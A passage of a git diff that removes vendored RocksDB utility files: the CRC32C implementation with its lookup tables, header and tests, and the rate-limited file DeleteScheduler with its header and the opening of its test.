-  0xee7cd990, 0x4b3d4bee, 0xa1138b9d, 0x045219e3,
-  0x48f3434f, 0xedb2d131, 0x079c1142, 0xa2dd833c,
-  0xd62de755, 0x736c752b, 0x9942b558, 0x3c032726,
-  0xe144fb14, 0x4405696a, 0xae2ba919, 0x0b6a3b67,
-  0x7f9a5f0e, 0xdadbcd70, 0x30f50d03, 0x95b49f7d,
-  0xd915c5d1, 0x7c5457af, 0x967a97dc, 0x333b05a2,
-  0x47cb61cb, 0xe28af3b5, 0x08a433c6, 0xade5a1b8,
-  0x91e6869e, 0x34a714e0, 0xde89d493, 0x7bc846ed,
-  0x0f382284, 0xaa79b0fa, 0x40577089, 0xe516e2f7,
-  0xa9b7b85b, 0x0cf62a25, 0xe6d8ea56, 0x43997828,
-  0x37691c41, 0x92288e3f, 0x78064e4c, 0xdd47dc32,
-  0xc76580d9, 0x622412a7, 0x880ad2d4, 0x2d4b40aa,
-  0x59bb24c3, 0xfcfab6bd, 0x16d476ce, 0xb395e4b0,
-  0xff34be1c, 0x5a752c62, 0xb05bec11, 0x151a7e6f,
-  0x61ea1a06, 0xc4ab8878, 0x2e85480b, 0x8bc4da75,
-  0xb7c7fd53, 0x12866f2d, 0xf8a8af5e, 0x5de93d20,
-  0x29195949, 0x8c58cb37, 0x66760b44, 0xc337993a,
-  0x8f96c396, 0x2ad751e8, 0xc0f9919b, 0x65b803e5,
-  0x1148678c, 0xb409f5f2, 0x5e273581, 0xfb66a7ff,
-  0x26217bcd, 0x8360e9b3, 0x694e29c0, 0xcc0fbbbe,
-  0xb8ffdfd7, 0x1dbe4da9, 0xf7908dda, 0x52d11fa4,
-  0x1e704508, 0xbb31d776, 0x511f1705, 0xf45e857b,
-  0x80aee112, 0x25ef736c, 0xcfc1b31f, 0x6a802161,
-  0x56830647, 0xf3c29439, 0x19ec544a, 0xbcadc634,
-  0xc85da25d, 0x6d1c3023, 0x8732f050, 0x2273622e,
-  0x6ed23882, 0xcb93aafc, 0x21bd6a8f, 0x84fcf8f1,
-  0xf00c9c98, 0x554d0ee6, 0xbf63ce95, 0x1a225ceb,
-  0x8b277743, 0x2e66e53d, 0xc448254e, 0x6109b730,
-  0x15f9d359, 0xb0b84127, 0x5a968154, 0xffd7132a,
-  0xb3764986, 0x1637dbf8, 0xfc191b8b, 0x595889f5,
-  0x2da8ed9c, 0x88e97fe2, 0x62c7bf91, 0xc7862def,
-  0xfb850ac9, 0x5ec498b7, 0xb4ea58c4, 0x11abcaba,
-  0x655baed3, 0xc01a3cad, 0x2a34fcde, 0x8f756ea0,
-  0xc3d4340c, 0x6695a672, 0x8cbb6601, 0x29faf47f,
-  0x5d0a9016, 0xf84b0268, 0x1265c21b, 0xb7245065,
-  0x6a638c57, 0xcf221e29, 0x250cde5a, 0x804d4c24,
-  0xf4bd284d, 0x51fcba33, 0xbbd27a40, 0x1e93e83e,
-  0x5232b292, 0xf77320ec, 0x1d5de09f, 0xb81c72e1,
-  0xccec1688, 0x69ad84f6, 0x83834485, 0x26c2d6fb,
-  0x1ac1f1dd, 0xbf8063a3, 0x55aea3d0, 0xf0ef31ae,
-  0x841f55c7, 0x215ec7b9, 0xcb7007ca, 0x6e3195b4,
-  0x2290cf18, 0x87d15d66, 0x6dff9d15, 0xc8be0f6b,
-  0xbc4e6b02, 0x190ff97c, 0xf321390f, 0x5660ab71,
-  0x4c42f79a, 0xe90365e4, 0x032da597, 0xa66c37e9,
-  0xd29c5380, 0x77ddc1fe, 0x9df3018d, 0x38b293f3,
-  0x7413c95f, 0xd1525b21, 0x3b7c9b52, 0x9e3d092c,
-  0xeacd6d45, 0x4f8cff3b, 0xa5a23f48, 0x00e3ad36,
-  0x3ce08a10, 0x99a1186e, 0x738fd81d, 0xd6ce4a63,
-  0xa23e2e0a, 0x077fbc74, 0xed517c07, 0x4810ee79,
-  0x04b1b4d5, 0xa1f026ab, 0x4bdee6d8, 0xee9f74a6,
-  0x9a6f10cf, 0x3f2e82b1, 0xd50042c2, 0x7041d0bc,
-  0xad060c8e, 0x08479ef0, 0xe2695e83, 0x4728ccfd,
-  0x33d8a894, 0x96993aea, 0x7cb7fa99, 0xd9f668e7,
-  0x9557324b, 0x3016a035, 0xda386046, 0x7f79f238,
-  0x0b899651, 0xaec8042f, 0x44e6c45c, 0xe1a75622,
-  0xdda47104, 0x78e5e37a, 0x92cb2309, 0x378ab177,
-  0x437ad51e, 0xe63b4760, 0x0c158713, 0xa954156d,
-  0xe5f54fc1, 0x40b4ddbf, 0xaa9a1dcc, 0x0fdb8fb2,
-  0x7b2bebdb, 0xde6a79a5, 0x3444b9d6, 0x91052ba8
-};
-static const uint32_t table3_[256] = {
-  0x00000000, 0xdd45aab8, 0xbf672381, 0x62228939,
-  0x7b2231f3, 0xa6679b4b, 0xc4451272, 0x1900b8ca,
-  0xf64463e6, 0x2b01c95e, 0x49234067, 0x9466eadf,
-  0x8d665215, 0x5023f8ad, 0x32017194, 0xef44db2c,
-  0xe964b13d, 0x34211b85, 0x560392bc, 0x8b463804,
-  0x924680ce, 0x4f032a76, 0x2d21a34f, 0xf06409f7,
-  0x1f20d2db, 0xc2657863, 0xa047f15a, 0x7d025be2,
-  0x6402e328, 0xb9474990, 0xdb65c0a9, 0x06206a11,
-  0xd725148b, 0x0a60be33, 0x6842370a, 0xb5079db2,
-  0xac072578, 0x71428fc0, 0x136006f9, 0xce25ac41,
-  0x2161776d, 0xfc24ddd5, 0x9e0654ec, 0x4343fe54,
-  0x5a43469e, 0x8706ec26, 0xe524651f, 0x3861cfa7,
-  0x3e41a5b6, 0xe3040f0e, 0x81268637, 0x5c632c8f,
-  0x45639445, 0x98263efd, 0xfa04b7c4, 0x27411d7c,
-  0xc805c650, 0x15406ce8, 0x7762e5d1, 0xaa274f69,
-  0xb327f7a3, 0x6e625d1b, 0x0c40d422, 0xd1057e9a,
-  0xaba65fe7, 0x76e3f55f, 0x14c17c66, 0xc984d6de,
-  0xd0846e14, 0x0dc1c4ac, 0x6fe34d95, 0xb2a6e72d,
-  0x5de23c01, 0x80a796b9, 0xe2851f80, 0x3fc0b538,
-  0x26c00df2, 0xfb85a74a, 0x99a72e73, 0x44e284cb,
-  0x42c2eeda, 0x9f874462, 0xfda5cd5b, 0x20e067e3,
-  0x39e0df29, 0xe4a57591, 0x8687fca8, 0x5bc25610,
-  0xb4868d3c, 0x69c32784, 0x0be1aebd, 0xd6a40405,
-  0xcfa4bccf, 0x12e11677, 0x70c39f4e, 0xad8635f6,
-  0x7c834b6c, 0xa1c6e1d4, 0xc3e468ed, 0x1ea1c255,
-  0x07a17a9f, 0xdae4d027, 0xb8c6591e, 0x6583f3a6,
-  0x8ac7288a, 0x57828232, 0x35a00b0b, 0xe8e5a1b3,
-  0xf1e51979, 0x2ca0b3c1, 0x4e823af8, 0x93c79040,
-  0x95e7fa51, 0x48a250e9, 0x2a80d9d0, 0xf7c57368,
-  0xeec5cba2, 0x3380611a, 0x51a2e823, 0x8ce7429b,
-  0x63a399b7, 0xbee6330f, 0xdcc4ba36, 0x0181108e,
-  0x1881a844, 0xc5c402fc, 0xa7e68bc5, 0x7aa3217d,
-  0x52a0c93f, 0x8fe56387, 0xedc7eabe, 0x30824006,
-  0x2982f8cc, 0xf4c75274, 0x96e5db4d, 0x4ba071f5,
-  0xa4e4aad9, 0x79a10061, 0x1b838958, 0xc6c623e0,
-  0xdfc69b2a, 0x02833192, 0x60a1b8ab, 0xbde41213,
-  0xbbc47802, 0x6681d2ba, 0x04a35b83, 0xd9e6f13b,
-  0xc0e649f1, 0x1da3e349, 0x7f816a70, 0xa2c4c0c8,
-  0x4d801be4, 0x90c5b15c, 0xf2e73865, 0x2fa292dd,
-  0x36a22a17, 0xebe780af, 0x89c50996, 0x5480a32e,
-  0x8585ddb4, 0x58c0770c, 0x3ae2fe35, 0xe7a7548d,
-  0xfea7ec47, 0x23e246ff, 0x41c0cfc6, 0x9c85657e,
-  0x73c1be52, 0xae8414ea, 0xcca69dd3, 0x11e3376b,
-  0x08e38fa1, 0xd5a62519, 0xb784ac20, 0x6ac10698,
-  0x6ce16c89, 0xb1a4c631, 0xd3864f08, 0x0ec3e5b0,
-  0x17c35d7a, 0xca86f7c2, 0xa8a47efb, 0x75e1d443,
-  0x9aa50f6f, 0x47e0a5d7, 0x25c22cee, 0xf8878656,
-  0xe1873e9c, 0x3cc29424, 0x5ee01d1d, 0x83a5b7a5,
-  0xf90696d8, 0x24433c60, 0x4661b559, 0x9b241fe1,
-  0x8224a72b, 0x5f610d93, 0x3d4384aa, 0xe0062e12,
-  0x0f42f53e, 0xd2075f86, 0xb025d6bf, 0x6d607c07,
-  0x7460c4cd, 0xa9256e75, 0xcb07e74c, 0x16424df4,
-  0x106227e5, 0xcd278d5d, 0xaf050464, 0x7240aedc,
-  0x6b401616, 0xb605bcae, 0xd4273597, 0x09629f2f,
-  0xe6264403, 0x3b63eebb, 0x59416782, 0x8404cd3a,
-  0x9d0475f0, 0x4041df48, 0x22635671, 0xff26fcc9,
-  0x2e238253, 0xf36628eb, 0x9144a1d2, 0x4c010b6a,
-  0x5501b3a0, 0x88441918, 0xea669021, 0x37233a99,
-  0xd867e1b5, 0x05224b0d, 0x6700c234, 0xba45688c,
-  0xa345d046, 0x7e007afe, 0x1c22f3c7, 0xc167597f,
-  0xc747336e, 0x1a0299d6, 0x782010ef, 0xa565ba57,
-  0xbc65029d, 0x6120a825, 0x0302211c, 0xde478ba4,
-  0x31035088, 0xec46fa30, 0x8e647309, 0x5321d9b1,
-  0x4a21617b, 0x9764cbc3, 0xf54642fa, 0x2803e842
-};
-
-// Used to fetch a naturally-aligned 32-bit word in little endian byte-order
-static inline uint32_t LE_LOAD32(const uint8_t *p) {
-  return DecodeFixed32(reinterpret_cast<const char*>(p));
-}
-
-#if defined(HAVE_SSE42) && (defined(__LP64__) || defined(_WIN64))
-static inline uint64_t LE_LOAD64(const uint8_t *p) {
-  return DecodeFixed64(reinterpret_cast<const char*>(p));
-}
-#endif
-
-static inline void Slow_CRC32(uint64_t* l, uint8_t const **p) {
-  uint32_t c = static_cast<uint32_t>(*l ^ LE_LOAD32(*p));
-  *p += 4;
-  *l = table3_[c & 0xff] ^
-  table2_[(c >> 8) & 0xff] ^
-  table1_[(c >> 16) & 0xff] ^
-  table0_[c >> 24];
-  // DO it twice.
-  c = static_cast<uint32_t>(*l ^ LE_LOAD32(*p));
-  *p += 4;
-  *l = table3_[c & 0xff] ^
-  table2_[(c >> 8) & 0xff] ^
-  table1_[(c >> 16) & 0xff] ^
-  table0_[c >> 24];
-}
-
-static inline void Fast_CRC32(uint64_t* l, uint8_t const **p) {
-#ifndef HAVE_SSE42
-  Slow_CRC32(l, p);
-#elif defined(__LP64__) || defined(_WIN64)
-  *l = _mm_crc32_u64(*l, LE_LOAD64(*p));
-  *p += 8;
-#else
-  *l = _mm_crc32_u32(static_cast<unsigned int>(*l), LE_LOAD32(*p));
-  *p += 4;
-  *l = _mm_crc32_u32(static_cast<unsigned int>(*l), LE_LOAD32(*p));
-  *p += 4;
-#endif
-}
-
-template<void (*CRC32)(uint64_t*, uint8_t const**)>
-uint32_t ExtendImpl(uint32_t crc, const char* buf, size_t size) {
-  const uint8_t *p = reinterpret_cast<const uint8_t *>(buf);
-  const uint8_t *e = p + size;
-  uint64_t l = crc ^ 0xffffffffu;
-
-// Align n to (1 << m) byte boundary
-#define ALIGN(n, m)     ((n + ((1 << m) - 1)) & ~((1 << m) - 1))
-
-#define STEP1 do {                              \
-    int c = (l & 0xff) ^ *p++;                  \
-    l = table0_[c] ^ (l >> 8);                  \
-} while (0)
-
-
-  // Point x at first 16-byte aligned byte in string.  This might be
-  // just past the end of the string.
-  const uintptr_t pval = reinterpret_cast<uintptr_t>(p);
-  const uint8_t* x = reinterpret_cast<const uint8_t*>(ALIGN(pval, 4));
-  if (x <= e) {
-    // Process bytes until finished or p is 16-byte aligned
-    while (p != x) {
-      STEP1;
-    }
-  }
-  // Process bytes 16 at a time
-  while ((e-p) >= 16) {
-    CRC32(&l, &p);
-    CRC32(&l, &p);
-  }
-  // Process bytes 8 at a time
-  while ((e-p) >= 8) {
-    CRC32(&l, &p);
-  }
-  // Process the last few bytes
-  while (p != e) {
-    STEP1;
-  }
-#undef STEP1
-#undef ALIGN
-  return static_cast<uint32_t>(l ^ 0xffffffffu);
-}
-
-// Detect if SS42 or not.
-static bool isSSE42() {
-#ifndef HAVE_SSE42
-  return false;
-#elif defined(__GNUC__) && defined(__x86_64__) && !defined(IOS_CROSS_COMPILE)
-  uint32_t c_;
-  uint32_t d_;
-  __asm__("cpuid" : "=c"(c_), "=d"(d_) : "a"(1) : "ebx");
-  return c_ & (1U << 20);  // copied from CpuId.h in Folly.
-#elif defined(_WIN64)
-  int info[4];
-  __cpuidex(info, 0x00000001, 0);
-  return (info[2] & ((int)1 << 20)) != 0;
-#else
-  return false;
-#endif
-}
-
-typedef uint32_t (*Function)(uint32_t, const char*, size_t);
-
-static inline Function Choose_Extend() {
-  return isSSE42() ? ExtendImpl<Fast_CRC32> : ExtendImpl<Slow_CRC32>;
-}
-
-bool IsFastCrc32Supported() {
-  return isSSE42();
-}
-
-Function ChosenExtend = Choose_Extend();
-
-uint32_t Extend(uint32_t crc, const char* buf, size_t size) {
-  return ChosenExtend(crc, buf, size);
-}
-
-}  // namespace crc32c
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/util/crc32c.h b/thirdparty/rocksdb/util/crc32c.h
deleted file mode 100644
index 9848529..0000000
--- a/thirdparty/rocksdb/util/crc32c.h
+++ /dev/null
@@ -1,48 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#pragma once
-#include <stddef.h>
-#include <stdint.h>
-
-namespace rocksdb {
-namespace crc32c {
-
-extern bool IsFastCrc32Supported();
-
-// Return the crc32c of concat(A, data[0,n-1]) where init_crc is the
-// crc32c of some string A.  Extend() is often used to maintain the
-// crc32c of a stream of data.
-extern uint32_t Extend(uint32_t init_crc, const char* data, size_t n);
-
-// Return the crc32c of data[0,n-1]
-inline uint32_t Value(const char* data, size_t n) {
-  return Extend(0, data, n);
-}
-
-static const uint32_t kMaskDelta = 0xa282ead8ul;
-
-// Return a masked representation of crc.
-//
-// Motivation: it is problematic to compute the CRC of a string that
-// contains embedded CRCs.  Therefore we recommend that CRCs stored
-// somewhere (e.g., in files) should be masked before being stored.
-inline uint32_t Mask(uint32_t crc) {
-  // Rotate right by 15 bits and add a constant.
-  return ((crc >> 15) | (crc << 17)) + kMaskDelta;
-}
-
-// Return the crc whose masked representation is masked_crc.
-inline uint32_t Unmask(uint32_t masked_crc) {
-  uint32_t rot = masked_crc - kMaskDelta;
-  return ((rot >> 17) | (rot << 15));
-}
-
-}  // namespace crc32c
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/util/crc32c_test.cc b/thirdparty/rocksdb/util/crc32c_test.cc
deleted file mode 100644
index 306194e..0000000
--- a/thirdparty/rocksdb/util/crc32c_test.cc
+++ /dev/null
@@ -1,78 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#include "util/crc32c.h"
-#include "util/testharness.h"
-
-namespace rocksdb {
-namespace crc32c {
-
-class CRC { };
-
-TEST(CRC, StandardResults) {
-  // From rfc3720 section B.4.
-  char buf[32];
-
-  memset(buf, 0, sizeof(buf));
-  ASSERT_EQ(0x8a9136aaU, Value(buf, sizeof(buf)));
-
-  memset(buf, 0xff, sizeof(buf));
-  ASSERT_EQ(0x62a8ab43U, Value(buf, sizeof(buf)));
-
-  for (int i = 0; i < 32; i++) {
-    buf[i] = i;
-  }
-  ASSERT_EQ(0x46dd794eU, Value(buf, sizeof(buf)));
-
-  for (int i = 0; i < 32; i++) {
-    buf[i] = 31 - i;
-  }
-  ASSERT_EQ(0x113fdb5cU, Value(buf, sizeof(buf)));
-
-  unsigned char data[48] = {
-    0x01, 0xc0, 0x00, 0x00,
-    0x00, 0x00, 0x00, 0x00,
-    0x00, 0x00, 0x00, 0x00,
-    0x00, 0x00, 0x00, 0x00,
-    0x14, 0x00, 0x00, 0x00,
-    0x00, 0x00, 0x04, 0x00,
-    0x00, 0x00, 0x00, 0x14,
-    0x00, 0x00, 0x00, 0x18,
-    0x28, 0x00, 0x00, 0x00,
-    0x00, 0x00, 0x00, 0x00,
-    0x02, 0x00, 0x00, 0x00,
-    0x00, 0x00, 0x00, 0x00,
-  };
-  ASSERT_EQ(0xd9963a56, Value(reinterpret_cast<char*>(data), sizeof(data)));
-}
-
-TEST(CRC, Values) {
-  ASSERT_NE(Value("a", 1), Value("foo", 3));
-}
-
-TEST(CRC, Extend) {
-  ASSERT_EQ(Value("hello world", 11),
-            Extend(Value("hello ", 6), "world", 5));
-}
-
-TEST(CRC, Mask) {
-  uint32_t crc = Value("foo", 3);
-  ASSERT_NE(crc, Mask(crc));
-  ASSERT_NE(crc, Mask(Mask(crc)));
-  ASSERT_EQ(crc, Unmask(Mask(crc)));
-  ASSERT_EQ(crc, Unmask(Unmask(Mask(Mask(crc)))));
-}
-
-}  // namespace crc32c
-}  // namespace rocksdb
-
-int main(int argc, char** argv) {
-  ::testing::InitGoogleTest(&argc, argv);
-  return RUN_ALL_TESTS();
-}
diff --git a/thirdparty/rocksdb/util/delete_scheduler.cc b/thirdparty/rocksdb/util/delete_scheduler.cc
deleted file mode 100644
index 93fc166..0000000
--- a/thirdparty/rocksdb/util/delete_scheduler.cc
+++ /dev/null
@@ -1,234 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#ifndef ROCKSDB_LITE
-
-#include "util/delete_scheduler.h"
-
-#include <thread>
-#include <vector>
-
-#include "port/port.h"
-#include "rocksdb/env.h"
-#include "util/logging.h"
-#include "util/mutexlock.h"
-#include "util/sst_file_manager_impl.h"
-#include "util/sync_point.h"
-
-namespace rocksdb {
-
-DeleteScheduler::DeleteScheduler(Env* env, const std::string& trash_dir,
-                                 int64_t rate_bytes_per_sec, Logger* info_log,
-                                 SstFileManagerImpl* sst_file_manager)
-    : env_(env),
-      trash_dir_(trash_dir),
-      total_trash_size_(0),
-      rate_bytes_per_sec_(rate_bytes_per_sec),
-      pending_files_(0),
-      closing_(false),
-      cv_(&mu_),
-      info_log_(info_log),
-      sst_file_manager_(sst_file_manager) {
-  assert(sst_file_manager != nullptr);
-  bg_thread_.reset(
-      new port::Thread(&DeleteScheduler::BackgroundEmptyTrash, this));
-}
-
-DeleteScheduler::~DeleteScheduler() {
-  {
-    InstrumentedMutexLock l(&mu_);
-    closing_ = true;
-    cv_.SignalAll();
-  }
-  if (bg_thread_) {
-    bg_thread_->join();
-  }
-}
-
-Status DeleteScheduler::DeleteFile(const std::string& file_path) {
-  Status s;
-  if (rate_bytes_per_sec_.load() <= 0 ||
-      total_trash_size_.load() >
-          sst_file_manager_->GetTotalSize() * max_trash_db_ratio_) {
-    // Rate limiting is disabled or trash size makes up more than
-    // max_trash_db_ratio_ (default 25%) of the total DB size
-    TEST_SYNC_POINT("DeleteScheduler::DeleteFile");
-    s = env_->DeleteFile(file_path);
-    if (s.ok()) {
-      sst_file_manager_->OnDeleteFile(file_path);
-    }
-    return s;
-  }
-
-  // Move file to trash
-  std::string path_in_trash;
-  s = MoveToTrash(file_path, &path_in_trash);
-  if (!s.ok()) {
-    ROCKS_LOG_ERROR(info_log_, "Failed to move %s to trash directory (%s)",
-                    file_path.c_str(), trash_dir_.c_str());
-    s = env_->DeleteFile(file_path);
-    if (s.ok()) {
-      sst_file_manager_->OnDeleteFile(file_path);
-    }
-    return s;
-  }
-
-  // Add file to delete queue
-  {
-    InstrumentedMutexLock l(&mu_);
-    queue_.push(path_in_trash);
-    pending_files_++;
-    if (pending_files_ == 1) {
-      cv_.SignalAll();
-    }
-  }
-  return s;
-}
-
-std::map<std::string, Status> DeleteScheduler::GetBackgroundErrors() {
-  InstrumentedMutexLock l(&mu_);
-  return bg_errors_;
-}
-
-Status DeleteScheduler::MoveToTrash(const std::string& file_path,
-                                    std::string* path_in_trash) {
-  Status s;
-  // Figure out the name of the file in trash folder
-  size_t idx = file_path.rfind("/");
-  if (idx == std::string::npos || idx == file_path.size() - 1) {
-    return Status::InvalidArgument("file_path is corrupted");
-  }
-  *path_in_trash = trash_dir_ + file_path.substr(idx);
-  std::string unique_suffix = "";
-
-  if (*path_in_trash == file_path) {
-    // This file is already in trash
-    return s;
-  }
-
-  // TODO(tec) : Implement Env::RenameFileIfNotExist and remove
-  //             file_move_mu mutex.
-  InstrumentedMutexLock l(&file_move_mu_);
-  while (true) {
-    s = env_->FileExists(*path_in_trash + unique_suffix);
-    if (s.IsNotFound()) {
-      // We found a path for our file in trash
-      *path_in_trash += unique_suffix;
-      s = env_->RenameFile(file_path, *path_in_trash);
-      break;
-    } else if (s.ok()) {
-      // Name conflict, generate new random suffix
-      unique_suffix = env_->GenerateUniqueId();
-    } else {
-      // Error during FileExists call, we cannot continue
-      break;
-    }
-  }
-  if (s.ok()) {
-    uint64_t trash_file_size = 0;
-    sst_file_manager_->OnMoveFile(file_path, *path_in_trash, &trash_file_size);
-    total_trash_size_.fetch_add(trash_file_size);
-  }
-  return s;
-}
-
-void DeleteScheduler::BackgroundEmptyTrash() {
-  TEST_SYNC_POINT("DeleteScheduler::BackgroundEmptyTrash");
-
-  while (true) {
-    InstrumentedMutexLock l(&mu_);
-    while (queue_.empty() && !closing_) {
-      cv_.Wait();
-    }
-
-    if (closing_) {
-      return;
-    }
-
-    // Delete all files in queue_
-    uint64_t start_time = env_->NowMicros();
-    uint64_t total_deleted_bytes = 0;
-    int64_t current_delete_rate = rate_bytes_per_sec_.load();
-    while (!queue_.empty() && !closing_) {
-      if (current_delete_rate != rate_bytes_per_sec_.load()) {
-        // User changed the delete rate
-        current_delete_rate = rate_bytes_per_sec_.load();
-        start_time = env_->NowMicros();
-        total_deleted_bytes = 0;
-      }
-
-      // Get new file to delete
-      std::string path_in_trash = queue_.front();
-      queue_.pop();
-
-      // We dont need to hold the lock while deleting the file
-      mu_.Unlock();
-      uint64_t deleted_bytes = 0;
-      // Delete file from trash and update total_penlty value
-      Status s = DeleteTrashFile(path_in_trash,  &deleted_bytes);
-      total_deleted_bytes += deleted_bytes;
-      mu_.Lock();
-
-      if (!s.ok()) {
-        bg_errors_[path_in_trash] = s;
-      }
-
-      // Apply penlty if necessary
-      uint64_t total_penlty;
-      if (current_delete_rate > 0) {
-        // rate limiting is enabled
-        total_penlty =
-            ((total_deleted_bytes * kMicrosInSecond) / current_delete_rate);
-        while (!closing_ && !cv_.TimedWait(start_time + total_penlty)) {}
-      } else {
-        // rate limiting is disabled
-        total_penlty = 0;
-      }
-      TEST_SYNC_POINT_CALLBACK("DeleteScheduler::BackgroundEmptyTrash:Wait",
-                               &total_penlty);
-
-      pending_files_--;
-      if (pending_files_ == 0) {
-        // Unblock WaitForEmptyTrash since there are no more files waiting
-        // to be deleted
-        cv_.SignalAll();
-      }
-    }
-  }
-}
-
-Status DeleteScheduler::DeleteTrashFile(const std::string& path_in_trash,
-                                        uint64_t* deleted_bytes) {
-  uint64_t file_size;
-  Status s = env_->GetFileSize(path_in_trash, &file_size);
-  if (s.ok()) {
-    TEST_SYNC_POINT("DeleteScheduler::DeleteTrashFile:DeleteFile");
-    s = env_->DeleteFile(path_in_trash);
-  }
-
-  if (!s.ok()) {
-    // Error while getting file size or while deleting
-    ROCKS_LOG_ERROR(info_log_, "Failed to delete %s from trash -- %s",
-                    path_in_trash.c_str(), s.ToString().c_str());
-    *deleted_bytes = 0;
-  } else {
-    *deleted_bytes = file_size;
-    total_trash_size_.fetch_sub(file_size);
-    sst_file_manager_->OnDeleteFile(path_in_trash);
-  }
-
-  return s;
-}
-
-void DeleteScheduler::WaitForEmptyTrash() {
-  InstrumentedMutexLock l(&mu_);
-  while (pending_files_ > 0 && !closing_) {
-    cv_.Wait();
-  }
-}
-
-}  // namespace rocksdb
-
-#endif  // ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/util/delete_scheduler.h b/thirdparty/rocksdb/util/delete_scheduler.h
deleted file mode 100644
index 4c07ed6..0000000
--- a/thirdparty/rocksdb/util/delete_scheduler.h
+++ /dev/null
@@ -1,111 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#pragma once
-
-#ifndef ROCKSDB_LITE
-
-#include <map>
-#include <queue>
-#include <string>
-#include <thread>
-
-#include "monitoring/instrumented_mutex.h"
-#include "port/port.h"
-
-#include "rocksdb/status.h"
-
-namespace rocksdb {
-
-class Env;
-class Logger;
-class SstFileManagerImpl;
-
-// DeleteScheduler allows the DB to enforce a rate limit on file deletion,
-// Instead of deleteing files immediately, files are moved to trash_dir
-// and deleted in a background thread that apply sleep penlty between deletes
-// if they are happening in a rate faster than rate_bytes_per_sec,
-//
-// Rate limiting can be turned off by setting rate_bytes_per_sec = 0, In this
-// case DeleteScheduler will delete files immediately.
-class DeleteScheduler {
- public:
-  DeleteScheduler(Env* env, const std::string& trash_dir,
-                  int64_t rate_bytes_per_sec, Logger* info_log,
-                  SstFileManagerImpl* sst_file_manager);
-
-  ~DeleteScheduler();
-
-  // Return delete rate limit in bytes per second
-  int64_t GetRateBytesPerSecond() { return rate_bytes_per_sec_.load(); }
-
-  // Set delete rate limit in bytes per second
-  void SetRateBytesPerSecond(int64_t bytes_per_sec) {
-    return rate_bytes_per_sec_.store(bytes_per_sec);
-  }
-
-  // Move file to trash directory and schedule it's deletion
-  Status DeleteFile(const std::string& fname);
-
-  // Wait for all files being deleteing in the background to finish or for
-  // destructor to be called.
-  void WaitForEmptyTrash();
-
-  // Return a map containing errors that happened in BackgroundEmptyTrash
-  // file_path => error status
-  std::map<std::string, Status> GetBackgroundErrors();
-
-  uint64_t GetTotalTrashSize() { return total_trash_size_.load(); }
-
-  void TEST_SetMaxTrashDBRatio(double r) {
-    assert(r >= 0);
-    max_trash_db_ratio_ = r;
-  }
-
- private:
-  Status MoveToTrash(const std::string& file_path, std::string* path_in_trash);
-
-  Status DeleteTrashFile(const std::string& path_in_trash,
-                         uint64_t* deleted_bytes);
-
-  void BackgroundEmptyTrash();
-
-  Env* env_;
-  // Path to the trash directory
-  std::string trash_dir_;
-  // total size of trash directory
-  std::atomic<uint64_t> total_trash_size_;
-  // Maximum number of bytes that should be deleted per second
-  std::atomic<int64_t> rate_bytes_per_sec_;
-  // Mutex to protect queue_, pending_files_, bg_errors_, closing_
-  InstrumentedMutex mu_;
-  // Queue of files in trash that need to be deleted
-  std::queue<std::string> queue_;
-  // Number of files in trash that are waiting to be deleted
-  int32_t pending_files_;
-  // Errors that happened in BackgroundEmptyTrash (file_path => error)
-  std::map<std::string, Status> bg_errors_;
-  // Set to true in ~DeleteScheduler() to force BackgroundEmptyTrash to stop
-  bool closing_;
-  // Condition variable signaled in these conditions
-  //    - pending_files_ value change from 0 => 1
-  //    - pending_files_ value change from 1 => 0
-  //    - closing_ value is set to true
-  InstrumentedCondVar cv_;
-  // Background thread running BackgroundEmptyTrash
-  std::unique_ptr<port::Thread> bg_thread_;
-  // Mutex to protect threads from file name conflicts
-  InstrumentedMutex file_move_mu_;
-  Logger* info_log_;
-  SstFileManagerImpl* sst_file_manager_;
-  // If the trash size constitutes for more than 25% of the total DB size
-  // we will start deleting new files passed to DeleteScheduler immediately
-  double max_trash_db_ratio_ = 0.25;
-  static const uint64_t kMicrosInSecond = 1000 * 1000LL;
-};
-
-}  // namespace rocksdb
-
-#endif  // ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/util/delete_scheduler_test.cc b/thirdparty/rocksdb/util/delete_scheduler_test.cc
deleted file mode 100644
index 208bdd7..0000000
--- a/thirdparty/rocksdb/util/delete_scheduler_test.cc
+++ /dev/null
@@ -1,563 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#ifndef __STDC_FORMAT_MACROS
-#define __STDC_FORMAT_MACROS
-#endif
-
-#include <inttypes.h>
-#include <atomic>
-#include <thread>
-#include <vector>
-
-#include "rocksdb/env.h"
-#include "rocksdb/options.h"
-#include "util/delete_scheduler.h"
-#include "util/sst_file_manager_impl.h"
-#include "util/string_util.h"
-#include "util/sync_point.h"
-#include "util/testharness.h"
-#include "util/testutil.h"
-
-#ifndef ROCKSDB_LITE
-
-namespace rocksdb {
-
-class DeleteSchedulerTest : public testing::Test {
- public:
-  DeleteSchedulerTest() : env_(Env::Default()) {
-    dummy_files_dir_ = test::TmpDir(env_) + "/delete_scheduler_dummy_data_dir";
-    DestroyAndCreateDir(dummy_files_dir_);
